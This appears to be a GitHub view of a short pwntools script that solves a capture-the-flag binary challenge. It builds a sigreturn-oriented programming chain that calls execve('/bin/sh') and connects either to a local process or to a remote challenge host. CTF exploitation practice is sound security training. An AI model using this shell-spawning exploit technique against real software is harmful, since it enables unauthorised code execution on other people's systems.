-
Notifications
You must be signed in to change notification settings - Fork 1
/
pwn-twist-local.py
54 lines (37 loc) · 1000 Bytes
/
pwn-twist-local.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import *
binary = args.BIN
context.terminal = ["tmux", "splitw", "-h"]
e = context.binary = ELF(binary)
r = ROP(e)
gs = '''
continue
'''
def start():
if args.GDB:
return gdb.debug(e.path, gdbscript=gs)
elif args.REMOTE:
return remote('0.cloud.chals.io', 13658)
else:
return process(e.path)
p = start()
pop_rax = e.sym['pop_rax']+4
info("Pop RAX = %s", hex(pop_rax))
syscall_ret = e.sym['ret_syscall']+4
info("Syscall RET = %s", hex(syscall_ret))
bin_sh = next(e.search(b'/bin/sh'))
info("BinSH = %s", hex(bin_sh))
def srop_exec():
chain = p64(pop_rax)
chain += p64(0xf)
chain += p64(syscall_ret)
frame = SigreturnFrame(arch="amd64", kernel="amd64")
frame.rax = constants.SYS_execve
frame.rdi = bin_sh
frame.rip = syscall_ret
return chain+bytes(frame)
p.recvuntil(b'Debug Mode Enabled; calling ')
debug_mode = int(p.recvline(), 16)
pad = cyclic(16)
chain = srop_exec()
p.sendline(pad+chain)
p.interactive()